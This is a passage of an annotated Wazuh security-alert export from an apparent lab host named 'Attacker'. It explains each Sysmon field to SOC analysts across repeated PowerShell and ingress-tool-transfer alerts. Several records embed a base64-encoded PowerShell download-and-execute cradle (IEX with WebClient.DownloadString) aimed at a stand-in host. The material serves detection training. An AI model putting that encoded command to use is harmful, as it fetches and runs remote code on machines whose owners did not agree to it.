data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd6c-680a-7e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14508
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:43.587+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:43.587+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  79
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534323.1697945
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:41.1587369Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284778
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:41.132 ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} ProcessId: 6508 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ue5td5oc.hr3.ps1 CreationUtcTime: 2025-04-24 22:38:41.132 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:41.132
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd6f-680a-840b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6508
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ue5td5oc.hr3.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:41.132
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:47.118+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:47.118+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  76
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534327.1700710
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:45.1715994Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284820
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:42.397 ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} ProcessId: 15968 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} ParentProcessId: 6508 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:42.397
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd72-680a-860b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd6f-680a-840b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  6508
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:47.166+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:47.166+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  80
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534327.1708777
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:45.3727583Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284823
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:45.358 ProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} ProcessId: 15968 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_55t22iid.tbx.ps1 CreationUtcTime: 2025-04-24 22:38:45.358 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:45.358
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd72-680a-860b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_55t22iid.tbx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:45.358
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:50.423+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:50.423+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  77
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534330.1711546
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:48.2560190Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284882
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:46.626 ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} ProcessId: 16036 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd72-680a-860b-000000000e00} ParentProcessId: 15968 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:46.626
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd76-680a-890b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
